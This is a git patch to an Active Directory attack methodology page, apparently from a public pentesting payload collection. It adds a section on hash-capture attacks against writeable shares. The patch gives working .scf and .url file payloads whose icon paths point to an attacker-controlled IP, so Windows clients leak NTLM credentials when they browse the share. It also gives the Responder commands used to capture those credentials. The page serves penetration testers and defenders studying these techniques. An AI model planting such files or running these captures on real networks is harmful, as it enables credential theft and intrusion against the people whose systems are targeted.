From 639dc9faecfb1c682fb5b9d5fd6ad7885846b846 Mon Sep 17 00:00:00 2001
From: Swissky <12152583+swisskyrepo@users.noreply.github.com>
Date: Thu, 14 Nov 2019 23:54:57 +0100
Subject: [PATCH] .url file in writeable share

---
 .../Active Directory Attack.md                    | 15 +++++++++++++--
 1 file changed, 13 insertions(+), 2 deletions(-)

diff --git a/Methodology and Resources/Active Directory Attack.md b/Methodology and Resources/Active Directory Attack.md
index 9bea0d9..57f9df3 100644
--- a/Methodology and Resources/Active Directory Attack.md	
+++ b/Methodology and Resources/Active Directory Attack.md	
@@ -264,9 +264,9 @@ smbmount //X.X.X.X/c$ /mnt/remote/ -o username=user,password=pass,rw
 sudo mount -t cifs -o username=<user>,password=<pass> //<IP>/Users folder
 ```
 
-### SCF file attack against writeable share
+### SCF and URL file attack against writeable share
 
-Drop the following `something.scf` file inside a share and start listening with Responder : `responder -wrf --lm -v -I eth0`
+Drop the following `@something.scf` file inside a share and start listening with Responder : `responder -wrf --lm -v -I eth0`
 
 ```powershell
 [Shell]
@@ -276,6 +276,17 @@ IconFile=\\10.10.XX.XX\Share\test.ico
 Command=ToggleDesktop
 ```
 
+This attack also works with `.url` files and `responder -I eth0 -v`.
+
+```powershell
+[InternetShortcut]
+URL=whatever
+WorkingDirectory=whatever
+IconFile=\\192.168.1.29\%USERNAME%.icon
+IconIndex=1
+```
+
+
 ### GPO - Pivoting with Local Admin & Passwords in SYSVOL
 
 :triangular_flag_on_post: GPO Priorization : Organization Unit > Domain > Site > Local